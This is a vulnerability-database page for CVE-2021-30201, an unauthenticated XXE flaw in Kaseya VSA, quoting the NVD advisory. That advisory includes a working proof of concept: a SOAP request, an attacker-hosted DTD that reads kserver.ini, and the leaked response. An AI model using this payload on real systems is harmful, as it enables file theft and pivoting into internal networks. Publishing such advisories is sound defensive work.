目標達成 すべての支援者に感謝 — 100%達成しました!

目標: 1000 CNY · 調達済み: 1000 CNY

100.0%

CVE-2021-30201— Kaseya VSA 代码问题漏洞

CVSS 7.5 · High EPSS 0.33% · P56
新しい脆弱性情報の通知を購読するログインして購読

I. CVE-2021-30201の基本情報

脆弱性情報

脆弱性についてご質問がありますか?Shenlongの分析が参考になるかご確認ください!
Shenlongの10の質問を表示 ↗

高度な大規模言語モデル技術を使用していますが、出力には不正確または古い情報が含まれる可能性があります。Shenlongはデータの正確性を確保するよう努めていますが、実際の状況に基づいて検証・判断してください。

脆弱性タイトル
Unauthenticated XML External Entity vulnerability in Kaseya VSA < v9.5.6
ソース: NVD (National Vulnerability Database)
脆弱性説明
The API /vsaWS/KaseyaWS.asmx can be used to submit XML to the system. When this XML is processed (external) entities are insecurely processed and fetched by the system and returned to the attacker. Detailed description Given the following request: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:kas="KaseyaWS"> <soapenv:Header/> <soapenv:Body> <kas:PrimitiveResetPassword> <!--type: string--> <kas:XmlRequest><![CDATA[<!DOCTYPE data SYSTEM "http://192.168.1.170:8080/oob.dtd"><data>&send;</data>]]> </kas:XmlRequest> </kas:PrimitiveResetPassword> </soapenv:Body> </soapenv:Envelope> ``` And the following XML file hosted at http://192.168.1.170/oob.dtd: ``` <!ENTITY % file SYSTEM "file://c:\\kaseya\\kserver\\kserver.ini"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>"> %eval; %error; ``` The server will fetch this XML file and process it, it will read the file c:\\kaseya\\kserver\\kserver.ini and returns the content in the server response like below. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><soap:Fault><faultcode>soap:Server</faultcode><faultstring>Server was unable to process request. ---&gt; There is an error in XML document (24, -1000).\r\n\r\nSystem.Xml.XmlException: Fragment identifier '######################################################################## # This is the configuration file for the KServer. # Place it in the same directory as the KServer executable # A blank line or new valid section header [] terminates each section. # Comment lines start with ; or # ######################################################################## <snip> ``` Security issues discovered --- * The API insecurely resolves external XML entities * The API has an overly verbose error response Impact --- Using this vulnerability an attacker can read any file on the server the webserver process can read. Additionally, it can be used to perform HTTP(s) requests into the local network and thus use the Kaseya system to pivot into the local network.
ソース: NVD (National Vulnerability Database)
CVSS情報
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
ソース: NVD (National Vulnerability Database)
脆弱性タイプ
N/A
ソース: NVD (National Vulnerability Database)
脆弱性タイトル
Kaseya VSA 代码问题漏洞
ソース: CNNVD (China National Vulnerability Database)
脆弱性説明
Kaseya VSA是美国Kaseya公司的托管服务提供商 (MSP) 常用来管理客户网络的RMM(远程监控和管理)软件。 Kaseya VSA 9.5.6 之前版本存在代码问题漏洞,该漏洞源于外部输入数据构造代码段的过程中,网络系统或产品未正确过滤其中的特殊元素。攻击者可利用该漏洞生成非法的代码段,修改网络系统或组件的预期的执行控制流。
ソース: CNNVD (China National Vulnerability Database)
CVSS情報
N/A
ソース: CNNVD (China National Vulnerability Database)
脆弱性タイプ
N/A
ソース: CNNVD (China National Vulnerability Database)

影響を受ける製品

ベンダープロダクト影響を受けるバージョンCPE購読
-n/a n/a -

II. CVE-2021-30201の公開POC

#POC説明ソースリンクShenlongリンク
AI生成POCプレミアム

公開POCは見つかりませんでした。

ログインしてAI POCを生成

III. CVE-2021-30201のインテリジェンス情報

登录查看更多情报信息。

Same Patch Batch · n/a · 2021-07-09 · 49 CVEs total

CVE-2021-3011610.0 CRITICALUnauthenticated credential leak and business logic flaw in Kaseya VSA <= v9.5.6
CVE-2021-301209.9 CRITICAL2FA bypass in Kaseya VSA <= v9.5.6
CVE-2021-301189.8 CRITICALUnauthenticated Remote Code Execution in Kaseya VSA < v9.5.5
CVE-2021-301179.8 CRITICALAuthenticated SQL injection in Kaseya VSA < v9.5.6
CVE-2021-234058.3 HIGHSQL Injection
CVE-2021-301216.5 MEDIUM(Semi-)Authenticated local file inclusion in Kaseya VSA < v9.5.6
CVE-2021-301195.4 MEDIUMAuthenticated Authenticated reflective XSS in Kaseya VSA <= v9.5.6
CVE-2020-35987Rukovoditel 跨站脚本漏洞
CVE-2020-25875Codoforum 跨站脚本漏洞
CVE-2020-25876Codoforum 跨站脚本漏洞
CVE-2020-25394moziloCMS 跨站脚本漏洞
CVE-2020-21333PublicCMS 跨站脚本漏洞
CVE-2021-35358Dotcms dotCMS 跨站脚本漏洞
CVE-2021-35361Dotcms dotCMS 跨站脚本漏洞
CVE-2021-35360Dotcms dotCMS 跨站脚本漏洞
CVE-2021-36371Emissary-Ingress 信任管理问题漏洞
CVE-2021-33214Hms Networks eCatcher 安全漏洞
CVE-2021-33792Foxit Reader 和 Foxit PhantomPDF 缓冲区错误漏洞
CVE-2021-33795Foxit Reader和Foxit PhantomPDF 安全漏洞
CVE-2021-27038Autodesk Design Review 安全漏洞

Showing 20 of 49 CVEs. View all on vendor page →

IV. 関連脆弱性

V. CVE-2021-30201へのコメント

まだコメントはありません


コメントを残す